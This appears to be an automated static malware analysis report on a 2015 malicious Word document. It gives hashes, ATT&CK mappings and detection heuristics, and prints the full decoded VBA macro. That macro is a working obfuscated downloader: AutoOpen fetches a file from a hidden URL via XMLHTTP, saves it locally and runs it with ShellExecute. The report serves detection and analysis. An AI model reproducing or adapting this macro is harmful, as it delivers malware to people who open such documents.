Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3cf6a0c90dad3b16…

MALICIOUS

Office (OLE)

Size: 41.5 KB
Created: 2015-01-19 20:05:00
Authoring application: Microsoft Office Word
First seen: 2015-02-05
MD5: 5e1df6fe93ed7dabc0fa7f4c9bebe94e
SHA-1: 949a0705b8fa592a6ffd23cf0327b1af53e83c2b
SHA-256: 3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb
Risk score: 306

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen subroutine, a common technique in malicious Office documents. The script uses `CreateObject` and `ShellExecute` to download and execute a second-stage payload from a remote source. The function `H1Ow3ak` appears to be responsible for downloading a file from a URL and saving it locally, likely for subsequent execution. The obfuscation and the use of these APIs strongly suggest downloader or dropper functionality.

Heuristics (11)

  • ClamAV: Doc.Dropper.Downloader-6398288-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Downloader-6398288-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 6 related findings
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] (OLE_VBA_WBOPEN)
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Matched line in script:
        xlapp.ShellExecute Environ(Fe5OknS("NECx26a0n42p13B9MlIN612m312E387O248TQ0crMt")) & Fe5OknS("mBR2U9sd2s5tG1dqVx5c0gPf52tTuk5k0me5yBS15Kgw2LsLAF410ku1vI5w0Y5P1yYfL5i2cbox46EM1Fo0w1eaN120Z10u1quhJE")
  • Reference to ShellExecute API [high] (SC_STR_SHELLEXEC)
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7000 bytes
SHA-256: e74d2b1a5438a4148f0792f14db3fd9408dac6c69e2b1fad80c2a0ab11cecfbe
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 3 long base64-like blob(s).

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
TestingTheCode
End Sub
Sub AutoOpen()
    uiwefds
End Sub
Sub Workbook_Open()
    uiwefds
End Sub
Function H1Ow3ak(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
    Dim lGCG As Long, vFF As Long, oResp() As Byte
Dim SHjTQi As Variant
     





    Set oXMLHTTP = CreateObject(Fe5OknS("0twX11c55d12b4L5132t0jY1155I11X40THO75g06K9a0VhEQe0l6H151T320H11ai5511P4o0108r0m126Y0z1M26k01R20N04DpG"))
Dim fb5av As Byte
    oXMLHTTP.Open Fe5OknS("dbts2I20121qrcB510313k9260J4UhS7"), vWebFile, False
Dim aVXAWg As Byte
    oXMLHTTP.Send
Dim Lki1CNFc As String
     





     




    oResp = oXMLHTTP.responseBody
Dim UfkdQdNI As Currency
     





    vFF = FreeFile
Dim Cqof5C As Currency
    If Dir(vLocalFile) <> "" Then Kill vLocalFile
Dim GrEYSHj As Object
    Open vLocalFile For Binary Access Write As #vFF
Dim vv0aa As Variant
    Put #vFF, , oResp
Dim XFcLk As Object
    Close #vFF
Dim BeadIsF As Currency

    Set oXMLHTTP = Nothing
Dim QeVkdIP As Boolean
    Dim xlapp As Object
Dim Bgg8Irqgg As Double
    Set xlapp = CreateObject(Fe5OknS("LXY11U3WMh2b8ScA1U6U64C16sqX16Y1bdc7gh28G1x7t28jo7U3TeGcP6H1l55OK2XuZ17k92HT17q9KXlnLS211fJ16Puxo21Sj7ky28z168wa0HKp1sVYT5m84DME15ox5218kQT5QV6Z1qu680Oll177kbRy6by176PJ0aczLp"))
Dim uUSHG As Variant
    xlapp.ShellExecute Environ(Fe5OknS("NECx26a0n42p13B9MlIN612m312E387O248TQ0crMt")) & Fe5OknS("mBR2U9sd2s5tG1dqVx5c0gPf52tTuk5k0me5yBS15Kgw2LsLAF410ku1vI5w0Y5P1yYfL5i2cbox46EM1Fo0w1eaN120Z10u1quhJE")
Dim aiOX As Date
    End Function
Sub TestingTheCode()
Dim TLc As Byte
FHbjkjkjl = Fe5OknS("wc0f4HH472CW4988f49x88t4s8162I494n2X021ig2d02143kv4346x87Z49vi4519xJ3546MW87e4343Y4k300c45R1p54sC343473ZA0O4945B43k43c4902VoeViY612m43507O4E45es15u4m257D4343gv1978QJu45154pX730k43T864F773fad20214s5Y5849f45HW2t021f4214r451E5tI4730R1h978X4z343H516Bp043Vu43O8QR")
Dim csBg7Uk As Object
     




H1Ow3ak FHbjkjkjl, Environ(Fe5OknS("dpAd109z2Jm897wvSKGBku1m8ku131001Yrv104Ygf0Pdoh")) & Fe5OknS("0QB0w88k3Q2TfZqh48u9v64y8pR0i0l4fA9yJ9b2g4800UVXrRp48Ra96zHX4p9l92iFoSYo211UCD96Mqj48u00Tb4h8c96KX4Auik992Fq44t1G6dog96x9b6WU1wF152G0H9S69Jez6mOuyB")

End Sub
Function Fe5OknS(InputStringToBeDecrypted As String) As String
Dim hKXPe6UQt As String
Dim NIM7U3OHC As Byte
Dim wfplLuj As String
Dim E4IKSwHoMuU As Date
Dim HZe As String
Dim Ae3OiJIwM As Date
Dim DvLqAgFnNK As String
Dim dDAbaQ5UnHC As Byte
Dim logFek5AMr As String
Dim wHKoamG As Byte
Dim qy7OcMAXB As Integer
Dim hCD2ajLf As Byte
Dim g8IN2UsQvHE As Integer
Dim bXbT As Currency
On Error GoTo ErrorHandler
Dim JyXsn As Long
strTempText = InputStringToBeDecrypted
Dim qVd As Date
hKXPe6UQt = strTempText
Dim wmP As Object
wfplLuj = ""
Dim BZHge1O As Byte
hKXPe6UQt = Left(hKXPe6UQt, Len(hKXPe6UQt) - 4)
Dim lgUvhe As String
hKXPe6UQt = Right(hKXPe6UQt, Len(hKXPe6UQt) - 4)
Dim B3aOD As Object
nCharSize = 0
Dim RgZ7Iy3OU As Long
Call Extract_Char_Size(hKXPe6UQt, nCharSize)
Dim cc6Imhjw6Ak As Object
Call Extract_Enc_Key(hKXPe6UQt, nCharSize, nEncKey)
Dim RbgZM4EED As Byte
nTextLenght = Len(hKXPe6UQt)
Dim LVYCnAUOD As Object
For nCounter = 1 To Len(hKXPe6UQt) Step nCharSize
Dim aOoKGJnY As Boolean
DvLqAgFnNK = Mid(hKXPe6UQt, nCounter, nCharSize)
Dim rer4O7Y06AVQR As Date
nChar = uepu7At5S(DvLqAgFnNK)
Dim Nj3UK8ahVULL As Currency
nChar2 = nChar / nEncKey
Dim h7BdAL As Long
logFek5AMr = Chr(nChar2)
Dim lXjE As Byte
wfplLuj = wfplLuj + logFek5AMr
Dim tuA As Boolean
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
wfplLuj = Trim(wfplLuj)
Dim ioikN6O As Object
 Fe5OknS = wfplLuj
Dim tpPNnmcc As Byte
Exit Function
ErrorHandler:
Dim Ot8OeFE8a1PI As Date
End Function


Sub Extract_Char_Size(ByRef hKXPe6UQt, ByRef nCharSize)
Dim n8U2ORbX As Object
DecryptParts = DecryptParts & "/Extract_Char_Size/"
Dim tDkIq As Date
nLeft = Len(hKXPe6UQt) \ 2
Dim Uv6aCa1UqL As Boolean
strLeft = Left(hKXPe6UQt, nLeft)
Dim rjIhnijNj As String
Dim NsfHbXbTqQ As Date
nRight = Len(hKXPe6UQt) - nLeft
Dim ySlK7E4EE As Byte
strRight = Right(hKXPe6UQt, nRight)
Dim JWOdWB As Object
Dim Zpwdm3aO As Variant
strKeyEnc = Right(strLeft, 2)
Dim A1amPTBZ1I As Date
strKeySize = Left(strRight, 2)
Dim wm6n4I As Long
strKeyEnc = vMFj(strKeyEnc)
Dim eFEtuAPI As Date
strKeySize = vMFj(strKeySize)
Dim YtpskWioik As Object
nKeyEnc = Val(strKeyEnc)
Dim raWZEpC As String
nKeySize = Val(strKeySize)
Dim qdqM4aKKCRX As Variant
nCharSize = nKeySize - nKeyEnc
Dim clpT As Currency
hKXPe6UQt = Left(strLeft, Len(strLeft) - 2) + Right(strRight, Len(strRight) - 2)
Dim ybO7amlb As String
End Sub

Function vMFj(ByVal cString As String) As String
DecryptParts = DecryptParts & "/ vMFj/"
Dim o1AeBMeKv As Boolean
For nCounter = 1 To Len(cString)
Dim re2UX As String
DvLqAgFnNK = Mid(cString, nCounter, 1)
Dim GWe As Object
If IsNumeric(DvLqAgFnNK) Then
Dim YwyWVL2iD As Currency
Dim aNoJFIm4 As Long
strTempString = strTempString + DvLqAgFnNK
Dim X5E0a As Variant
Else
strTempString = strTempString + "0"
Dim IuJrn As Byte
End If
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
 vMFj = strTempString
Dim Ok3UL2ayWVLL As Currency
End Function

Function uepu7At5S(strTempText As String) As Integer
DecryptParts = DecryptParts & "/ uepu7At5S/"
Dim ShnEMeB As Date
strTempText = Trim(strTempText)
Dim h6AACeBM As Long
For nCounter = 1 To Len(strTempText)
Dim r7OC As String
DvLqAgFnNK = Mid(strTempText, nCounter, 1)
Dim EXf2KPIu As Long
If IsNumeric(DvLqAgFnNK) Then
Dim YwyWVL2iD As Currency
Dim aNoJFIm4 As Long
hKXPe6UQt = hKXPe6UQt + DvLqAgFnNK
Dim nAF As Double
End If
Next nCounter
Dim NtCj As Date
Dim mgiwh8A As Object
Dim ccqLVYCnAU As Currency
nResult = Val(hKXPe6UQt)
Dim RcgaN7UFEtt As Currency
 uepu7At5S = nResult
Dim fGFu1ASmg As Long
End Function

Sub Extract_Enc_Key(ByRef hKXPe6UQt, ByVal nCharSize, ByRef nEncKey)
Dim pvclTrZ As Object
DecryptParts = DecryptParts & "/Extract_Enc_Key/"
Dim G2UBMeK8ENo As Double
strEncKey = vbNullString
Dim k0AXfLU As Variant
qy7OcMAXB = Len(hKXPe6UQt) - nCharSize
Dim uJ0I As Variant
nLeft = qy7OcMAXB \ 2
Dim HclpTFRkfT As Variant
strLeft = Left(hKXPe6UQt, nLeft)
Dim rjIhnijNj As String
Dim NsfHbXbTqQ As Date
nRight = qy7OcMAXB - nLeft
Dim PI8f As Double
strRight = Right(hKXPe6UQt, nRight)
Dim JWOdWB As Object
Dim Zpwdm3aO As Variant
strEncKey = Mid(hKXPe6UQt, nLeft + 1, nCharSize)
Dim elC1I5 As Currency
strEncKey = vMFj(strEncKey)
Dim etmDLqA As Byte
nEncKey = Val(Trim(strEncKey))
Dim DhT As Date
hKXPe6UQt = strLeft + strRight
Dim Sa7I As Variant
End Sub